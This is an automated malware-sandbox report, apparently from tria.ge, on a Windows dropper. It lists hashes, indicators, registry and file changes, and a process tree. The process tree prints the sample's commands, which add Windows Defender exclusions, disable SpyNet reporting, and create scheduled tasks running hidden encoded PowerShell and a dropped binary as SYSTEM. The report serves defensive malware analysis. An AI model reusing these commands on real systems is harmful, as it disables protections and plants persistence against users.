Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
132s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
05/11/2022, 23:30
Static task
static1
Behavioral task
behavioral1
Sample
d7350c972897e968becf96239b63d7f13effef674839765ed3b951ede2d37c03.exe
Resource
win7-20220812-en
General
-
Target
d7350c972897e968becf96239b63d7f13effef674839765ed3b951ede2d37c03.exe
-
Size
7.3MB
-
MD5
42b500a762d2b21b27683eba173eb7c8
-
SHA1
1e28d1d4da2cb0be8aaf5bd01f2113caedff881e
-
SHA256
d7350c972897e968becf96239b63d7f13effef674839765ed3b951ede2d37c03
-
SHA512
cda91367a008c14430115b22bd81842912a6b6d970cd2dea8ceb17a0a600bc8695108fb2f91e63053f169e519702d07271b1b779f731f570a220b13ebc4aa552
-
SSDEEP
196608:91OJtmYER0Q0DiLrHkGWubRwt5+zzdpTC4O9FGKpxezXrP:3OJTEn0D0EGWuHzznC4EGKpgfP
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 111 3068 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4584 Install.exe 2084 Install.exe 3944 bIOhUzj.exe 968 wjxWvSc.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation wjxWvSc.exe -
Loads dropped DLL 1 IoCs
pid Process 3068 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json wjxWvSc.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini wjxWvSc.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_3B0C6F9A5FE4CC35B9E0194525154B89 wjxWvSc.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini bIOhUzj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA wjxWvSc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 wjxWvSc.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content wjxWvSc.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_3B0C6F9A5FE4CC35B9E0194525154B89 wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 wjxWvSc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 wjxWvSc.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol bIOhUzj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft wjxWvSc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 wjxWvSc.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\uDDeUXeESnNQC\fNiHzYk.dll wjxWvSc.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi wjxWvSc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi wjxWvSc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja wjxWvSc.exe File created C:\Program Files (x86)\wRBWtgmhNVeU2\sxPDPHA.xml wjxWvSc.exe File created C:\Program Files (x86)\eDwjHUlQleiMyYJGGLR\vNnifIL.dll wjxWvSc.exe File created C:\Program Files (x86)\eDwjHUlQleiMyYJGGLR\NqhFfRJ.xml wjxWvSc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wjxWvSc.exe File created C:\Program Files (x86)\RmIuiaUkU\LYwOmk.dll wjxWvSc.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wjxWvSc.exe File created C:\Program Files (x86)\RmIuiaUkU\gbOOlzK.xml wjxWvSc.exe File created C:\Program Files (x86)\wRBWtgmhNVeU2\GLEYBwqOMmukw.dll wjxWvSc.exe File created C:\Program Files (x86)\uDDeUXeESnNQC\ndPITLv.xml wjxWvSc.exe File created C:\Program Files (x86)\lKYgjwJOgvUn\DtDEexl.dll wjxWvSc.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\JuOTSXziioNjcYMEt.job schtasks.exe File created C:\Windows\Tasks\bhCXYHDqWKjBKHFGxm.job schtasks.exe File created C:\Windows\Tasks\cIepPELucUFHyMmti.job schtasks.exe File created C:\Windows\Tasks\LVkMoXcLjpRBuIo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3496 schtasks.exe 5020 schtasks.exe 3508 schtasks.exe 3204 schtasks.exe 4092 schtasks.exe 3908 schtasks.exe 2864 schtasks.exe 3708 schtasks.exe 1804 schtasks.exe 4156 schtasks.exe 1736 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume wjxWvSc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" wjxWvSc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer wjxWvSc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" wjxWvSc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" wjxWvSc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix wjxWvSc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket wjxWvSc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wjxWvSc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" wjxWvSc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000} wjxWvSc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" wjxWvSc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wjxWvSc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 3364 powershell.EXE 3364 powershell.EXE 1664 powershell.exe 1664 powershell.exe 100 powershell.exe 100 powershell.exe 1204 powershell.EXE 1204 powershell.EXE 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe 968 wjxWvSc.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3364 powershell.EXE Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 100 powershell.exe Token: SeDebugPrivilege 1204 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4736 wrote to memory of 4584 4736 d7350c972897e968becf96239b63d7f13effef674839765ed3b951ede2d37c03.exe 80 PID 4736 wrote to memory of 4584 4736 d7350c972897e968becf96239b63d7f13effef674839765ed3b951ede2d37c03.exe 80 PID 4736 wrote to memory of 4584 4736 d7350c972897e968becf96239b63d7f13effef674839765ed3b951ede2d37c03.exe 80 PID 4584 wrote to memory of 2084 4584 Install.exe 81 PID 4584 wrote to memory of 2084 4584 Install.exe 81 PID 4584 wrote to memory of 2084 4584 Install.exe 81 PID 2084 wrote to memory of 4156 2084 Install.exe 85 PID 2084 wrote to memory of 4156 2084 Install.exe 85 PID 2084 wrote to memory of 4156 2084 Install.exe 85 PID 2084 wrote to memory of 2316 2084 Install.exe 87 PID 2084 wrote to memory of 2316 2084 Install.exe 87 PID 2084 wrote to memory of 2316 2084 Install.exe 87 PID 4156 wrote to memory of 3584 4156 forfiles.exe 89 PID 4156 wrote to memory of 3584 4156 forfiles.exe 89 PID 4156 wrote to memory of 3584 4156 forfiles.exe 89 PID 2316 wrote to memory of 636 2316 forfiles.exe 90 PID 2316 wrote to memory of 636 2316 forfiles.exe 90 PID 2316 wrote to memory of 636 2316 forfiles.exe 90 PID 3584 wrote to memory of 1324 3584 cmd.exe 92 PID 3584 wrote to memory of 1324 3584 cmd.exe 92 PID 3584 wrote to memory of 1324 3584 cmd.exe 92 PID 636 wrote to memory of 812 636 cmd.exe 91 PID 636 wrote to memory of 812 636 cmd.exe 91 PID 636 wrote to memory of 812 636 cmd.exe 91 PID 3584 wrote to memory of 1376 3584 cmd.exe 93 PID 3584 wrote to memory of 1376 3584 cmd.exe 93 PID 3584 wrote to memory of 1376 3584 cmd.exe 93 PID 636 wrote to memory of 4744 636 cmd.exe 94 PID 636 wrote to memory of 4744 636 cmd.exe 94 PID 636 wrote to memory of 4744 636 cmd.exe 94 PID 2084 wrote to memory of 3508 2084 Install.exe 96 PID 2084 wrote to memory of 3508 2084 Install.exe 96 PID 2084 wrote to memory of 3508 2084 Install.exe 96 PID 2084 wrote to memory of 100 2084 Install.exe 98 PID 2084 wrote to memory of 100 2084 Install.exe 98 PID 2084 wrote to memory of 100 2084 Install.exe 98 PID 3364 wrote to memory of 4252 3364 powershell.EXE 102 PID 3364 wrote to memory of 4252 3364 powershell.EXE 102 PID 2084 wrote to memory of 4880 2084 Install.exe 109 PID 2084 wrote to memory of 4880 2084 Install.exe 109 PID 2084 wrote to memory of 4880 2084 Install.exe 109 PID 2084 wrote to memory of 3204 2084 Install.exe 111 PID 2084 wrote to memory of 3204 2084 Install.exe 111 PID 2084 wrote to memory of 3204 2084 Install.exe 111 PID 3944 wrote to memory of 1664 3944 bIOhUzj.exe 115 PID 3944 wrote to memory of 1664 3944 bIOhUzj.exe 115 PID 3944 wrote to memory of 1664 3944 bIOhUzj.exe 115 PID 1664 wrote to memory of 4188 1664 powershell.exe 117 PID 1664 wrote to memory of 4188 1664 powershell.exe 117 PID 1664 wrote to memory of 4188 1664 powershell.exe 117 PID 4188 wrote to memory of 1804 4188 cmd.exe 118 PID 4188 wrote to memory of 1804 4188 cmd.exe 118 PID 4188 wrote to memory of 1804 4188 cmd.exe 118 PID 1664 wrote to memory of 4872 1664 powershell.exe 119 PID 1664 wrote to memory of 4872 1664 powershell.exe 119 PID 1664 wrote to memory of 4872 1664 powershell.exe 119 PID 1664 wrote to memory of 1000 1664 powershell.exe 120 PID 1664 wrote to memory of 1000 1664 powershell.exe 120 PID 1664 wrote to memory of 1000 1664 powershell.exe 120 PID 1664 wrote to memory of 1052 1664 powershell.exe 121 PID 1664 wrote to memory of 1052 1664 powershell.exe 121 PID 1664 wrote to memory of 1052 1664 powershell.exe 121 PID 1664 wrote to memory of 4296 1664 powershell.exe 122 PID 1664 wrote to memory of 4296 1664 powershell.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7350c972897e968becf96239b63d7f13effef674839765ed3b951ede2d37c03.exe"C:\Users\Admin\AppData\Local\Temp\d7350c972897e968becf96239b63d7f13effef674839765ed3b951ede2d37c03.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\7zS6AA5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Users\Admin\AppData\Local\Temp\7zS6F0A.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1324
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1376
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:636 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:812
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4744
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guRPIgnCP" /SC once /ST 00:02:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guRPIgnCP"4⤵PID:100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guRPIgnCP"4⤵PID:4880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhCXYHDqWKjBKHFGxm" /SC once /ST 00:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rGlQBArSxsGkYLmXo\ImNPqrGKElSfAei\bIOhUzj.exe\" X4 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3204
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4252
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1072
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4612
-
C:\Users\Admin\AppData\Local\Temp\rGlQBArSxsGkYLmXo\ImNPqrGKElSfAei\bIOhUzj.exeC:\Users\Admin\AppData\Local\Temp\rGlQBArSxsGkYLmXo\ImNPqrGKElSfAei\bIOhUzj.exe X4 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3944 -
